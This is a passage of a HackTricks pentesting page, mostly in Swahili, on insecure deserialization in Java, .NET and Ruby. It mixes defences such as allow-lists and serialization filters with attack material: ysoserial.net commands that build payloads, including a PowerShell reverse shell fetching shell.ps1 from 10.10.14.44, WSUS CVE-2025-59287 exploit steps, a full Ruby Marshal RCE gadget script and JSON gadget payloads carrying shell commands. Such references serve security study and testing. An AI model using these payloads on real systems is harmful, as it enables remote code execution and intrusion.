Katika matukio ambapo baadhi ya vitu vinapaswa kutekeleza Serializable kutokana na mrundikano wa madarasa (class hierarchy), kuna hatari ya deserialization isiyotakiwa. Ili kuzuia hili, hakikisha vitu hivi haviwezi ku-deserialize kwa kutangaza final readObject() method ambayo kila mara hutupa exception, kama inavyoonyeshwa hapa chini:

private final void readObject(ObjectInputStream in) throws java.io.IOException {
throw new java.io.IOException("Cannot be deserialized");
}

Kuboresha Usalama wa Deserialization katika Java

Kubinafsisha java.io.ObjectInputStream ni njia ya vitendo ya kuhakikisha usalama wa mchakato wa deserialization. Njia hii inafaa wakati:

• msimbo wa deserialization uko chini ya udhibiti wako.
• darasa zinazotarajiwa kwa deserialization zinafahamika.

Tangaza upya method resolveClass() ili kupunguza deserialization kwa darasa zilizoruhusiwa tu. Hii inazuia deserialization ya darasa lolote isipokuwa zile zilizoruhusiwa wazi, kama kwenye mfano ufuatao unaopunguza deserialization kwa darasa la Bicycle tu:

// Code from https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
public class LookAheadObjectInputStream extends ObjectInputStream {

public LookAheadObjectInputStream(InputStream inputStream) throws IOException {
super(inputStream);
}

/**
* Only deserialize instances of our expected Bicycle class
*/
@Override
protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
if (!desc.getName().equals(Bicycle.class.getName())) {
throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName());
}
return super.resolveClass(desc);
}
}

Using a Java Agent for Security Enhancement inatoa suluhisho la dharura wakati urekebishaji wa msimbo hauwezekani. Njia hii inatumika hasa kwa blacklisting harmful classes, kwa kutumia kiparamu cha JVM:

-javaagent:name-of-agent.jar

Inatoa njia ya kufanya deserialization salama kwa njia ya dynamic, inayofaa kwa mazingira ambapo mabadiliko ya papo hapo kwenye code hayafai.

Angalia mfano katika rO0 by Contrast Security

Kutekeleza Serialization Filters: Java 9 ilianzisha serialization filters kupitia interface ya ObjectInputFilter, ikitoa mbinu yenye nguvu ya kuelezea vigezo ambavyo serialized objects lazima vitimize kabla ya ku-deserialized. Vichujio hivi vinaweza kutumika kwa ujumla au kwa kila stream, zikitoa udhibiti wa kina juu ya mchakato wa deserialization.

Ili kutumia serialization filters, unaweza kuweka filter ya global inayotumika kwa shughuli zote za deserialization au kuisanidi kwa njia ya dynamic kwa streams maalum. Kwa mfano:

ObjectInputFilter filter = info -> {
if (info.depth() > MAX_DEPTH) return Status.REJECTED; // Limit object graph depth
if (info.references() > MAX_REFERENCES) return Status.REJECTED; // Limit references
if (info.serialClass() != null && !allowedClasses.contains(info.serialClass().getName())) {
return Status.REJECTED; // Restrict to allowed classes
}
return Status.ALLOWED;
};
ObjectInputFilter.Config.setSerialFilter(filter);

Leveraging External Libraries for Enhanced Security: Libraries such as NotSoSerial, jdeserialize, and Kryo offer advanced features for controlling and monitoring Java deserialization. These libraries can provide additional layers of security, such as whitelisting or blacklisting classes, analyzing serialized objects before deserialization, and implementing custom serialization strategies.

• NotSoSerial intercepts deserialization processes to prevent execution of untrusted code.
• jdeserialize allows for the analysis of serialized Java objects without deserializing them, helping identify potentially malicious content.
• Kryo is an alternative serialization framework that emphasizes speed and efficiency, offering configurable serialization strategies that can enhance security.

Marejeo

• https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
• Deserialization and ysoserial talk: http://frohoff.github.io/appseccali-marshalling-pickles/
• https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
• https://www.youtube.com/watch?v=VviY3O-euVQ
• Talk about gadgetinspector: https://www.youtube.com/watch?v=wPbW6zQ52w8 and slides: https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf
• Marshalsec paper: https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true
• https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr
• https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
• https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
• Java and .Net JSON deserialization paper: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf, talk: https://www.youtube.com/watch?v=oUAeWhW5b8c and slides: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf
• Deserialziations CVEs: https://paper.seebug.org/123/

JNDI Injection & log4Shell

Find whats is JNDI Injection, how to abuse it via RMI, CORBA & LDAP and how to exploit log4shell (and example of this vuln) in the following page:

JNDI - Java Naming and Directory Interface & Log4Shell

JMS - Java Message Service

The Java Message Service (JMS) API is a Java message-oriented middleware API for sending messages between two or more clients. It is an implementation to handle the producer–consumer problem. JMS is a part of the Java Platform, Enterprise Edition (Java EE), and was defined by a specification developed at Sun Microsystems, but which has since been guided by the Java Community Process. It is a messaging standard that allows application components based on Java EE to create, send, receive, and read messages. It allows the communication between different components of a distributed application to be loosely coupled, reliable, and asynchronous. (From Wikipedia).

Bidhaa

Kuna bidhaa kadhaa zinazo tumia middleware hii kutuma ujumbe:

Uvunjaji

Kwa kifupi kuna huduma nyingi zinazotumia JMS kwa njia hatari. Kwa hivyo, ikiwa una idhini za kutosha za kutuma ujumbe kwa huduma hizi (kwa kawaida utahitaji vitambulisho halali) unaweza kuwa na uwezo wa kutuma malicious objects serialized that will be deserialized by the consumer/subscriber.
Hii ina maana kwamba katika udukuzi huu wateja wote ambao watatumia ujumbe huo wataambukizwa.

Kumbuka kwamba hata ikiwa huduma ni dhaifu (kwa sababu inafanya insecurely deserializing user input) bado unahitaji kupata gadgets halali ili kutumia udhaifu huo.

Zana JMET iliundwa ili kuunganisha na kuathiri huduma hizi kwa kutuma vitu vingi vilivyoulizwa kwa njia ya malicious serialized using known gadgets. Exploits hizi zitatumika ikiwa huduma bado ni dhaifu na ikiwa mojawapo ya gadgets zilizotumiwa iko ndani ya programu dhaifu.

Marejeo

• Patchstack advisory – Everest Forms unauthenticated PHP Object Injection (CVE-2025-52709)

• JMET talk: https://www.youtube.com/watch?v=0h8DWiOWGGA

• Slides: https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf

.Net

In the context of .Net, deserialization exploits operate in a manner akin to those found in Java, where gadgets are exploited to run specific code during the deserialization of an object.

Fingerprint

WhiteBox

The source code should be inspected for occurrences of:

1. TypeNameHandling
2. JavaScriptTypeResolver

The focus should be on serializers that permit the type to be determined by a variable under user control.

BlackBox

The search should target the Base64 encoded string AAEAAAD///// or any similar pattern that might undergo deserialization on the server-side, granting control over the type to be deserialized. This could include, but is not limited to, JSON or XML structures featuring TypeObject or $type.

ysoserial.net

In this case you can use the tool ysoserial.net in order to create the deserialization exploits. Once downloaded the git repository you should compile the tool using Visual Studio for example.

If you want to learn about how does ysoserial.net creates it’s exploit you can check this page where is explained the ObjectDataProvider gadget + ExpandedWrapper + Json.Net formatter.

The main options of ysoserial.net are: --gadget, --formatter, --output and --plugin.

• --gadget used to indicate the gadget to abuse (indicate the class/function that will be abused during deserialization to execute commands).
• --formatter, used to indicated the method to serialized the exploit (you need to know which library is using the back-end to deserialize the payload and use the same to serialize it)
• --output used to indicate if you want the exploit in raw or base64 encoded. Note that ysoserial.net will encode the payload using UTF-16LE (encoding used by default on Windows) so if you get the raw and just encode it from a linux console you might have some encoding compatibility problems that will prevent the exploit from working properly (in HTB JSON box the payload worked in both UTF-16LE and ASCII but this doesn’t mean it will always work).
• --plugin ysoserial.net supports plugins to craft exploits for specific frameworks like ViewState

More ysoserial.net parameters

• --minify will provide a smaller payload (if possible)
• --raf -f Json.Net -c "anything" This will indicate all the gadgets that can be used with a provided formatter (Json.Net in this case)
• --sf xml you can indicate a gadget (-g)and ysoserial.net will search for formatters containing “xml” (case insensitive)

ysoserial examples to create exploits:

#Send ping
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping -n 5 10.10.14.44" -o base64

#Timing
#I tried using ping and timeout but there wasn't any difference in the response timing from the web server

#DNS/HTTP request
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "nslookup sb7jkgm6onw1ymw0867mzm2r0i68ux.burpcollaborator.net" -o base64
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "certutil -urlcache -split -f http://rfaqfsze4tl7hhkt5jtp53a1fsli97.burpcollaborator.net/a a" -o base64

#Reverse shell
#Create shell command in linux
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.44/shell.ps1')" | iconv  -t UTF-16LE | base64 -w0
#Create exploit using the created B64 shellcode
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADQANAAvAHMAaABlAGwAbAAuAHAAcwAxACcAKQA=" -o base64

ysoserial.net pia ina kigezo cha kuvutia sana ambacho husaidia kuelewa vizuri zaidi jinsi kila exploit inavyofanya kazi: --test
Ikiwa utaonyesha kigezo hiki ysoserial.net itajaribu exploit ndani ya mashine yako, hivyo unaweza kujaribu kama payload yako itafanya kazi ipasavyo.
Kigezo hiki ni cha msaada kwa sababu ukikagua msimbo utaona vipande vya msimbo kama vifuatavyo (kutoka ObjectDataProviderGenerator.cs):

if (inputArgs.Test)
{
try
{
SerializersHelper.JsonNet_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}

Hii ina maana kwamba ili kujaribu exploit, msimbo utaita serializersHelper.JsonNet_deserialize

public static object JsonNet_deserialize(string str)
{
Object obj = JsonConvert.DeserializeObject<Object>(str, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
return obj;
}

Katika previous code is vulnerable to the exploit created. Kwa hivyo ikiwa unapata kitu kinachofanana katika programu ya .Net ina maana kwamba pengine programu hiyo nayo ni nyeti.
Hivyo parameter ya --test inatuwezesha kuelewa ni chunks gani za code zinaweza kuwa vulnerable kwa desrialization exploit ambayo ysoserial.net inaweza kuunda.

ViewState

Angalia posta hii kuhusu jinsi ya kujaribu exploit the __ViewState parameter of .Net ili execute arbitrary code. Ikiwa tayari unajua the secrets zinazotumika kwenye mashine ya mwathiriwa, soma chapisho hiki ili kujua jinsi ya execute code.

Real‑world sink: WSUS AuthorizationCookie & Reporting SOAP → BinaryFormatter/SoapFormatter RCE

• Endpoints zilizoathirika:
• /SimpleAuthWebService/SimpleAuth.asmx → GetCookie() AuthorizationCookie ime-decrypted kisha imedeserialize na BinaryFormatter.
• /ReportingWebService.asmx → ReportEventBatch na SOAP ops zinazohusiana ambazo zinafikia SoapFormatter sinks; base64 gadget inashughulikiwa wakati console ya WSUS inapochukua tukio.
• Root cause: attacker‑controlled bytes zinafika kwa legacy .NET formatters (BinaryFormatter/SoapFormatter) bila allow‑lists/binders madhubuti, hivyo gadget chains zinafanywa kama account ya huduma ya WSUS (mara nyingi SYSTEM).

Minimal exploitation (Reporting path):

1. Generate a .NET gadget with ysoserial.net (BinaryFormatter or SoapFormatter) and output base64, for example:

# Reverse shell (EncodedCommand) via BinaryFormatter
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -o base64 -c "powershell -NoP -W Hidden -Enc <BASE64_PS>"

# Simple calc via SoapFormatter (test)
ysoserial.exe -g TypeConfuseDelegate -f SoapFormatter -o base64 -c "calc.exe"

2. Tunga SOAP kwa ajili ya ReportEventBatch ukiingiza gadget ya base64 na kuipeleka kwa POST kwenye /ReportingWebService.asmx.
3. Wakati admin anafungua WSUS console, tukio linapotengenezwa tena kutoka kwa serialization (deserialized), gadget inawashwa (RCE kama SYSTEM).

AuthorizationCookie / GetCookie()

• AuthorizationCookie iliyofanywa kwa ulaghai inaweza kukubaliwa, kufichuliwa, na kupitishwa kwa sink ya BinaryFormatter, ikiruhusu pre‑auth RCE ikiwa inafikika.

Vigezo vya Public PoC (tecxx/CVE-2025-59287-WSUS):

$lhost = "192.168.49.51"
$lport = 53
$targetURL = "http://192.168.51.89:8530"

Tazama Windows Local Privilege Escalation – WSUS

Kuzuia

Ili kupunguza hatari zinazohusiana na deserialization katika .Net:

• Epukana kuruhusu mitiririko ya data (data streams) kufafanua aina zao za vitu. Tumia DataContractSerializer au XmlSerializer inapowezekana.
• Kwa JSON.Net, weka TypeNameHandling kuwa None: TypeNameHandling = TypeNameHandling.None
• Epukana kutumia JavaScriptSerializer pamoja na JavaScriptTypeResolver.
• Punguza aina zinazoweza kutengenezwa kwenye deserialization, ukiwa na uelewa wa hatari za aina za .Net, kama System.IO.FileInfo, ambazo zinaweza kubadilisha sifa za faili za server, na kusababisha denial of service attacks.
• Kuwa mwangalifu na aina zenye mali hatari, kama System.ComponentModel.DataAnnotations.ValidationException na mali yake Value, ambayo inaweza kutumika vibaya.
• Dhibiti kwa usalama uundaji wa aina ili kuzuia wawavunaji kuathiri mchakato wa deserialization, jambo ambalo linaweza kuifanya hata DataContractSerializer au XmlSerializer kuwa dhaifu.
• Tekeleza udhibiti wa orodha nyeupe (white list) kwa kutumia SerializationBinder maalum kwa BinaryFormatter na JSON.Net.
• Endelea kupata taarifa kuhusu gadgets zisizokuwa salama za deserialization ndani ya .Net na hakikisha deserializers hazitaundi aina hizo.
• Tenga msimbo wenye hatari unaowezekana kutoka kwa msimbo unaopata ufikiaji wa intaneti ili kuepuka kufichua gadgets zilizojulikana, kama System.Windows.Data.ObjectDataProvider katika programu za WPF, kwa vyanzo vya data visivyoaminika.

Marejeo

• Java and .Net JSON deserialization paper: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf, talk: https://www.youtube.com/watch?v=oUAeWhW5b8c and slides: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf
• https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp
• https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf
• https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization

Ruby

Katika Ruby, serialization inawezekeshwa kupitia mbinu mbili ndani ya maktaba ya marshal. Mbinu ya kwanza, inayojulikana kama dump, inatumiwa kubadilisha object kuwa mtiririko wa bytes. Mchakato huu unajulikana kama serialization. Kwa upande mwingine, mbinu ya pili, load, inatumiwa kurudisha mtiririko wa bytes kuwa object tena, mchakato unaojulikana kama deserialization.

Kwa kulinda vitu vilivyotengenezwa (serialized), Ruby inatumia HMAC (Hash-Based Message Authentication Code), kuhakikisha uadilifu na uhalali wa data. Ufunguo unaotumiwa kwa madhumuni haya unawekwa katika moja ya maeneo yafuatayo:

• config/environment.rb
• config/initializers/secret_token.rb
• config/secrets.yml
• /proc/self/environ

Ruby 2.X generic deserialization to RCE gadget chain (more info in https://www.elttam.com/blog/ruby-deserialization/):

#!/usr/bin/env ruby

# Code from https://www.elttam.com/blog/ruby-deserialization/

class Gem::StubSpecification
def initialize; end
end


stub_specification = Gem::StubSpecification.new
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")#RCE cmd must start with "|" and end with "1>&2"

puts "STEP n"
stub_specification.name rescue nil
puts


class Gem::Source::SpecificFile
def initialize; end
end

specific_file = Gem::Source::SpecificFile.new
specific_file.instance_variable_set(:@spec, stub_specification)

other_specific_file = Gem::Source::SpecificFile.new

puts "STEP n-1"
specific_file <=> other_specific_file rescue nil
puts


$dependency_list= Gem::DependencyList.new
$dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])

puts "STEP n-2"
$dependency_list.each{} rescue nil
puts


class Gem::Requirement
def marshal_dump
[$dependency_list]
end
end

payload = Marshal.dump(Gem::Requirement.new)

puts "STEP n-3"
Marshal.load(payload) rescue nil
puts


puts "VALIDATION (in fresh ruby process):"
IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
pipe.print payload
pipe.close_write
puts pipe.gets
puts
end

puts "Payload (hex):"
puts payload.unpack('H*')[0]
puts


require "base64"
puts "Payload (Base64 encoded):"
puts Base64.encode64(payload)

Mnyororo mwingine wa RCE kwa exploit Ruby On Rails: https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/

Ruby .send() method

Kama ilivyoelezwa katika this vulnerability report, ikiwa baadhi ya ingizo la mtumiaji lisilotakataliwa linafika kwenye .send() method ya object ya ruby, method hii inaruhusu kuitisha method nyingine yoyote ya object kwa parameters yoyote.

Kwa mfano, kuitisha eval kisha ruby code kama parameter ya pili kutaruhusu kutekeleza code yoyote:

<Object>.send('eval', '<user input with Ruby code>') == RCE

Zaidi ya hayo, ikiwa parameta moja tu ya .send() inadhibitiwa na mshambulizi, kama ilivyotajwa katika maelezo ya awali, inawezekana kuita method yoyote ya object ambayo haitaji vigezo au ambayo vigezo vyake vina thamani za chaguo-msingi.
Kwa hili, inawezekana kuorodhesha methods zote za object ili kupata baadhi ya methods zenye kuvutia zinazokidhi mahitaji hayo

<Object>.send('<user_input>')

# This code is taken from the original blog post
# <Object> in this case is Repository
## Find methods with those requirements
repo = Repository.find(1)  # get first repo
repo_methods = [           # get names of all methods accessible by Repository object
repo.public_methods(),
repo.private_methods(),
repo.protected_methods(),
].flatten()

repo_methods.length()      # Initial number of methods => 5542

## Filter by the arguments requirements
candidate_methods = repo_methods.select() do |method_name|
[0, -1].include?(repo.method(method_name).arity())
end
candidate_methods.length() # Final number of methods=> 3595

Ruby class pollution

Angalia jinsi inaweza kuwa inawezekana pollute a Ruby class and abuse it in here.

Ruby _json pollution

Unapotuma body, baadhi ya thamani zisizoweza kuhifadhiwa katika hash (kama array) zinaongezwa kwenye key mpya iitwayo _json. Hata hivyo, mshambuliaji anaweza pia kuweka kwenye body thamani iitwayo _json yenye thamani za hiari anazotaka. Kisha, ikiwa backend kwa mfano inakagua uhalisia wa parameter lakini pia inatumia parameter _json kutekeleza hatua fulani, inaweza kutokea bypass ya uthibitisho.

Tazama taarifa zaidi katika the Ruby _json pollution page.

Maktaba zingine

This technique was taken from this blog post.

Kuna maktaba nyingine za Ruby zinazoweza kutumika kuserialize objects na kwa hivyo zinaweza kutumiwa vibaya kupata RCE wakati wa insecure deserialization. Jedwali lifuatalo linaonyesha baadhi ya maktaba hizi na method wanayoiita ya maktaba iliyopakiwa kila inapokuwa unserialized (kazi ya kuudhi kutumika kupata RCE):

Mfano msingi:

# Existing Ruby class inside the code of the app
class SimpleClass
def initialize(cmd)
@cmd = cmd
end

def hash
system(@cmd)
end
end

# Exploit
require 'oj'
simple = SimpleClass.new("open -a calculator") # command for macOS
json_payload = Oj.dump(simple)
puts json_payload

# Sink vulnerable inside the code accepting user input as json_payload
Oj.load(json_payload)

Katika kesi ya kujaribu kutumia vibaya Oj, ilikuwa inawezekana kupata gadget class ambayo ndani ya hash function yake itaitisha to_s, ambayo itaitisha spec, ambayo itaitisha fetch_path, ambayo ilikuwezesha kuifanya itafute URL ya nasibu, na hivyo kutoa kigunduzi bora kwa aina hizi za unsanitized deserialization vulnerabilities.

{
"^o": "URI::HTTP",
"scheme": "s3",
"host": "example.org/anyurl?",
"port": "anyport",
"path": "/",
"user": "anyuser",
"password": "anypw"
}

Zaidi ya hayo, iligunduliwa kwamba kwa mbinu ya awali kabrasha pia huundwa kwenye mfumo, linalohitajika ili kutumia gadget nyingine na kuibadilisha hii kuwa RCE kamili kwa kitu kama:

{
"^o": "Gem::Resolver::SpecSpecification",
"spec": {
"^o": "Gem::Resolver::GitSpecification",
"source": {
"^o": "Gem::Source::Git",
"git": "zip",
"reference": "-TmTT=\"$(id>/tmp/anyexec)\"",
"root_dir": "/tmp",
"repository": "anyrepo",
"name": "anyname"
},
"spec": {
"^o": "Gem::Resolver::Specification",
"name": "name",
"dependencies": []
}
}
}

Check for more details in the original post.

Bootstrap Caching

Not really a desearilization vuln but a nice trick to abuse bootstrap caching to to get RCE from a rails application with an arbitrary file write (find the complete original post in here).

Hapa ni muhtasari mfupi wa hatua zilizoelezewa makala kwa kutumia Bootsnap caching kutekeleza exploit ya arbitrary file write:

• Identify the Vulnerability and Environment

Kazi ya upload ya faili ya app ya Rails inamruhusu mshambuliaji kuandika faili kwa njia ya arbitrary. Ingawa app inakimbia chini ya vikwazo (tu directories maalum kama tmp zinaweza kuandikwa kutokana na Docker user ambaye si root), hili bado linawezesha kuandika kwenye Bootsnap cache directory (kawaida chini ya tmp/cache/bootsnap).

• Understand Bootsnap’s Cache Mechanism

Bootsnap hupunguza muda wa kuanza kwa Rails kwa ku-cache compiled Ruby code, YAML, na JSON files. Inahifadhi cache files ambazo zina cache key header (zikijumuisha fields kama Ruby version, file size, mtime, compile options, n.k.) ikifuatiwa na compiled code. Header hii hutumika kuthibitisha cache wakati wa startup ya app.

• Gather File Metadata

Mshambuliaji kwanza huchagua faili lengwa inayowezekana ku-load wakati wa Rails startup (kwa mfano, set.rb kutoka katika standard library ya Ruby). Kwa kuendesha Ruby code ndani ya container, wanachakata metadata muhimu (kama RUBY_VERSION, RUBY_REVISION, size, mtime, na compile_option). Data hii ni muhimu kwa kutengeneza cache key halali.

• Compute the Cache File Path

Kwa kurudia mekanismi ya FNV-1a 64-bit hash ya Bootsnap, path sahihi ya cache file inahesabiwa. Hatua hii inahakikisha kwamba malicious cache file imewekwa mahali Bootsnap inatarajia (kwa mfano, chini ya tmp/cache/bootsnap/compile-cache-iseq/).

• Craft the Malicious Cache File

Mshambuliaji anatangaza payload ambayo:

• Inatekeleza amri za arbitrary (kwa mfano, kuendesha id ili kuonyesha info za process).
• Inafuta malicious cache baada ya utekelezaji ili kuzuia exploit ya recursive.
• Ina-load original file (kwa mfano, set.rb) ili kuepuka crash ya application.

Payload hii inakompyuliwa kuwa binary Ruby code na kuunganishwa na cache key header iliyotengenezwa kwa uangalifu (kutumia metadata iliyokusanywa hapo awali na version sahihi ya Bootsnap).

• Overwrite and Trigger Execution

Kwa kutumia arbitrary file write vulnerability, mshambuliaji anaandika crafted cache file kwenye location iliyohesabiwa. Kisha, wana-trigger restart ya server (kwa kuandika kwenye tmp/restart.txt, ambayo Puma inasoma). Wakati wa restart, wakati Rails inahitaji faili lengwa, malicious cache file itapakiwa, ikisababisha remote code execution (RCE).

Ruby Marshal exploitation in practice (updated)

Chukulia kila path ambapo bytes zisizoaminika zinafika kwenye Marshal.load/marshal_load kama sink ya RCE. Marshal inaunda upya arbitrary object graphs na inachochea callbacks za library/gem wakati wa materialization.

• Minimal vulnerable Rails code path:

class UserRestoreController < ApplicationController
def show
user_data = params[:data]
if user_data.present?
deserialized_user = Marshal.load(Base64.decode64(user_data))
render plain: "OK: #{deserialized_user.inspect}"
else
render plain: "No data", status: :bad_request
end
end
end

• Darasa za gadget za kawaida zinazoonekana katika real chains: Gem::SpecFetcher, Gem::Version, Gem::RequestSet::Lockfile, Gem::Resolver::GitSpecification, Gem::Source::Git.
• Kiashiria cha athari za pembeni cha kawaida kilichowekwa ndani ya payloads (kitekelezwa wakati wa unmarshal):

*-TmTT="$(id>/tmp/marshal-poc)"any.zip

Wapi hupatikana katika maombi ya kweli:

• Hifadhi za cache na hifadhi za session za Rails ambazo kihistoria zimetumia Marshal
• Backends za kazi za background na hifadhi za vitu zinazoegemea faili
• Uhifadhi wowote wa kibinafsi au usafirishaji wa blob za vitu za binary

Ugunduzi wa gadget wa viwandani:

• Tumia grep kutafuta constructors, hash, _load, init_with, au mbinu zinazosababisha athari za pembeni zinazoitwa wakati wa unmarshal
• Tumia CodeQL’s Ruby unsafe deserialization queries kufuatilia sources → sinks na kuibua gadgets
• Thibitisha kwa PoC za umma zenye format nyingi (JSON/XML/YAML/Marshal)

Marejeo

• Trail of Bits – Marshal madness: A brief history of Ruby deserialization exploits: https://blog.trailofbits.com/2025/08/20/marshal-madness-a-brief-history-of-ruby-deserialization-exploits/
• elttam – Ruby 2.x Universal RCE Deserialization Gadget Chain: https://www.elttam.com/blog/ruby-deserialization/
• Phrack #69 – Rails 3/4 Marshal chain: https://phrack.org/issues/69/12.html
• CVE-2019-5420 (Rails 5.2 insecure deserialization): https://nvd.nist.gov/vuln/detail/CVE-2019-5420
• ZDI – RCE via Ruby on Rails Active Storage insecure deserialization: https://www.zerodayinitiative.com/blog/2019/6/20/remote-code-execution-via-ruby-on-rails-active-storage-insecure-deserialization
• Include Security – Discovering gadget chains in Rubyland: https://blog.includesecurity.com/2024/03/discovering-deserialization-gadget-chains-in-rubyland/
• GitHub Security Lab – Ruby unsafe deserialization (query help): https://codeql.github.com/codeql-query-help/ruby/rb-unsafe-deserialization/
• GitHub Security Lab – PoCs repo: https://github.com/GitHubSecurityLab/ruby-unsafe-deserialization
• Doyensec PR – Ruby 3.4 gadget: https://github.com/GitHubSecurityLab/ruby-unsafe-deserialization/pull/1
• Luke Jahnke – Ruby 3.4 universal chain: https://nastystereo.com/security/ruby-3.4-deserialization.html
• Luke Jahnke – Gem::SafeMarshal escape: https://nastystereo.com/security/ruby-safe-marshal-escape.html
• Ruby 3.4.0-rc1 release: https://github.com/ruby/ruby/releases/tag/v3_4_0_rc1
• Ruby fix PR #12444: https://github.com/ruby/ruby/pull/12444
• Trail of Bits – Auditing RubyGems.org (Marshal findings): https://blog.trailofbits.com/2024/12/11/auditing-the-ruby-ecosystems-central-package-repository/
• watchTowr Labs – Is This Bad? This Feels Bad — GoAnywhere CVE-2025-10035: https://labs.watchtowr.com/is-this-bad-this-feels-bad-goanywhere-cve-2025-10035/
• OffSec – CVE-2025-59287 WSUS unsafe deserialization (blog)
• PoC – tecxx/CVE-2025-59287-WSUS
• RSC Report Lab – CVE-2025-55182 (React 19.2.0)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.